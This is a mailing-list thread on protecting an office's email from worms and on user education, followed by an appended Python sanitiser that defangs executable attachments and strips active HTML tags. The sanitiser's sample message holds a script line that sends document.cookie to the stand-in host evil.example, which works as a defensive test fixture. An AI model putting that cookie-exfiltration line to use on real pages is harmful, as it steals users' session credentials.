
Re: Email sanitizing - requesting advice



I like your suggestion of a combination of approaches to the problem.  I
could add virus ed 101 to the general orientation we give new employees
and volunteers at the office, which is already quite extensive with the
procedures for phone, the website, etc.

What I would need is a set of generally-accepted principles, e.g. "Don't
open any .exe files unless you are certain of whom they came from and
what they contain,"  or alternatively "Never open a .exe file before
checking with technical support or running XYZ virus scanning software
on it ..." or whatever.

With a list of such principles, updated regularly, I would take on the
education side.  As you know, I cannot generate that list (I was the one
who ran brain.exe from this system two months ago, remember?).  :)




Dan Brosemer wrote:
> 
> We've had an email filter running for 10 days on all @cleannorth.org
> addresses which catches such evils as email worms, trojans, and web bugs and
> disables them.  It also forces our virus scanner to run over all executable
> attachments before it lets you run them.  All in all, a good tool to have
> when you have a bunch of Windows machines that want to read email.
> 
> It also lets me know whenever someone sends something that is an obvious
> attack (but it doesn't send me the content of the message, just in case it
> wasn't -- I don't want to know if your aunt loves you, but I _do_ want to
> know if she's sending you the ILOVEYOU worm).
> 
> In the past 10 days, we've received (and neutralized) the Hybris worm twice.
> This thing is quite insidious.  An excellent technical description is here:
> http://www.f-secure.com/v-descs/hybris.shtml
> 
> This could be spread by web mail too.  And that's where my question
> comes in:
> 
> We only have four active users of the @cleannorth.org mail (even though
> everyone with a network account has an @cleannorth.org address).  Everyone
> else uses web mail, and...
> 
> I can't sanitize web mail, but I'm unwilling to just block webmail sites
> (Actually, I'm pretty much unwilling to block _any_ sites), so I'm wondering
> what we should do?
> 
> If I remove active content through a proxy filter, a lot of stupid, but
> useful, sites will be unusable (whether they were usable before or not is
> left to your own opinion).
> 
> The spread of Melissa showed quite conclusively that user education is all
> but useless, and the spread of the Anna Kournikova worm demonstrated that
> getting burned by Melissa didn't stop and make very many people think before
> being part of the next big email disaster.
> 
> So what's left?
> 
> And if we do settle on user education being the best we can do, how do we go
> about it?  I'm no educator.  The best I could probably do is beat the users
> with a stick until they promise not to open email attachments or use the two
> most easily exploited email systems (Hotmail and Yahoo) where no matter how
> hard you try, unless you go and manually inspect the code of each and every
> web page, you _can't_ use them securely.  (mail.com recently fixed this bug,
> that's why they're not on the list).
> 
> Anyone with education experience care to help out?
> 
> Any technical suggestions?
> 
> Any comments about how possible technical measures might impact usability?
> 
> Right now, I'm leaning to a _little_ of each.  I'll try to find a way to
> remove the <LAYER> tag (which only Netscape supports) by proxy filtering.
> That won't get rid of malicious javascript, but I think there's little we
> can do there.  On top of that, we need a bit of user education about running
> untrusted attachments.
> 
> The former I can do, but is there anyone willing to do user education?
> 
> And, someone, please come up with something better than this!
> 
> Don, Dee, Kathie, Dave, Jim, I'd appreciate your input especially.
> 
> Thanks
> -Dan
> 
> --
> "There are two limits that this standard places on the number of
> characters in a line. Each line of characters MUST be no more than
> 998 characters, and SHOULD be no more than 78 characters, excluding
> the CRLF."       -- rfc2822 - Internet Message Format

-- 
I am always doing what I cannot do yet, in order to learn how to 
do it.                         - Vincent Van Gogh
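As an added illustration of the two technical measures discussed in this thread (the list filter that "disables" worm attachments and forces a scan before an executable can be run, and Dan's plan to strip the Netscape <LAYER> tag from HTML), here is a small sanitiser in Python. It is example code written for this page; it is not the filter Dan is running on the @cleannorth.org addresses (that product is not named in the thread) and not code from anyone in the discussion. Two things are done to a parsed message: attachments whose name ends in an extension Windows would execute on double-click are renamed with a ".DEFANGED" suffix and forced to application/octet-stream, so the file can no longer be launched by accident (the user has to rename it deliberately, which is where the "check with technical support or run the scanner first" rule fits); and HTML bodies have the <LAYER>/<ILAYER> tags, plus <script> and the other embedding tags, removed. The extension list, the tag list, the suffix name and the sample message are all assumptions made here, and the sample message is constructed, not a captured worm.

```python
"""Mail sanitizer sketch (added example for this thread; not the filter Dan runs).

Two measures from the discussion: (1) neutralise executable attachments so a
double-click no longer runs them, (2) strip active HTML (the Netscape
<LAYER>/<ILAYER> tags plus <script> and friends) from HTML bodies.
Assumptions: the extension list, the tag list and the ".DEFANGED" suffix are
this example's own choices, not anything the thread specifies.
"""
import email
import os
from email import policy
from email.message import EmailMessage
from html.parser import HTMLParser

# Windows runs these on double-click; the list is an assumption, not exhaustive.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".cmd", ".pif", ".scr",
                   ".vbs", ".vbe", ".js", ".jse", ".shs", ".lnk", ".hta"}
# Tags dropped from HTML bodies; the body of <script> is dropped with the tag.
ACTIVE_TAGS = {"layer", "ilayer", "script", "object", "embed", "applet"}
DEFANG_SUFFIX = ".DEFANGED"   # assumed naming convention


class ActiveContentStripper(HTMLParser):
    """Re-emits the HTML it is fed, minus ACTIVE_TAGS and any <script> body."""

    def __init__(self):
        super().__init__(convert_charrefs=False)   # keep &amp; etc. verbatim
        self.out, self.removed, self.in_script = [], [], False

    def _emit(self, text):
        if not self.in_script:
            self.out.append(text)

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.removed.append(tag)
            self.in_script = self.in_script or tag == "script"
        else:
            self._emit(self.get_starttag_text())

    def handle_startendtag(self, tag, attrs):       # <embed ... />
        if tag in ACTIVE_TAGS:
            self.removed.append(tag)
        else:
            self._emit(self.get_starttag_text())

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        if tag not in ACTIVE_TAGS:
            self._emit(f"</{tag}>")

    def handle_data(self, data):
        self._emit(data)

    def handle_entityref(self, name):
        self._emit(f"&{name};")

    def handle_charref(self, name):
        self._emit(f"&#{name};")

    def handle_comment(self, data):
        self._emit(f"<!--{data}-->")


def strip_active_html(html: str) -> tuple[str, list[str]]:
    """Return (sanitised html, names of the tags that were removed)."""
    p = ActiveContentStripper()
    p.feed(html)
    p.close()
    return "".join(p.out), p.removed


def is_executable_name(filename: str) -> bool:
    """True for names Windows would execute; catches photo.jpg.vbs double extensions."""
    return os.path.splitext(filename)[1].lower() in EXECUTABLE_EXTS


def sanitize_message(raw: bytes) -> tuple[bytes, list[str]]:
    """Parse a raw RFC 2822 message, defang it, return (new bytes, log of actions)."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    log = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename()
        if name and is_executable_name(name):
            new = name + DEFANG_SUFFIX
            # Rewrite both headers so no mail client maps the part to a handler.
            del part["Content-Type"]
            del part["Content-Disposition"]
            part["Content-Type"] = f'application/octet-stream; name="{new}"'
            part["Content-Disposition"] = f'attachment; filename="{new}"'
            log.append(f"attachment renamed: {name} -> {new}")
        elif part.get_content_type() == "text/html":
            clean, removed = strip_active_html(part.get_content())
            if removed:
                part.set_content(clean, subtype="html")
                log.append("html: removed " + ", ".join(sorted(set(removed))))
    return msg.as_bytes(), log


def inspect_message(raw: bytes) -> dict:
    """Summarise attachment names and HTML bodies so before/after can be compared."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    names, html = [], []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_filename():
            names.append(part.get_filename())
        elif part.get_content_type() == "text/html":
            html.append(part.get_content())
    return {"attachments": names, "html": "".join(html)}


def build_sample() -> bytes:
    """Constructed test message (not a real capture): worm-style HTML plus a .vbs."""
    msg = EmailMessage()
    msg["From"] = "aunt@example.org"
    msg["To"] = "user@example.org"
    msg["Subject"] = "Here's the photo you wanted"
    msg.set_content("Your photo is attached.")
    msg.add_alternative(
        '<html><body>\n'
        '<p>Your photo is attached &amp; it is nice.</p>\n'
        '<layer src="http://evil.example/steal.html"></layer>\n'
        '<script>location="http://evil.example/?c="+document.cookie</script>\n'
        '</body></html>\n', subtype="html")
    msg.add_attachment(b'MsgBox "hello"\r\n', maintype="application",
                       subtype="octet-stream", filename="AnnaKournikova.jpg.vbs")
    return msg.as_bytes()


if __name__ == "__main__":
    out, actions = sanitize_message(build_sample())
    print("\n".join(actions))
    print(inspect_message(out))
```

Two caveats worth keeping in mind when reading this. Renaming the attachment only defeats the double-click; it does nothing about a user who renames the file back, which is exactly why the education side of the plan still matters. And the tag stripper only removes whole elements: JavaScript carried in attributes such as onload= or in javascript: URLs passes through untouched, which is the "little we can do" about malicious JavaScript that Dan mentions. The same strip_active_html() logic is what a proxy filter would run over the HTML of a web-mail page, with the same limitation.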

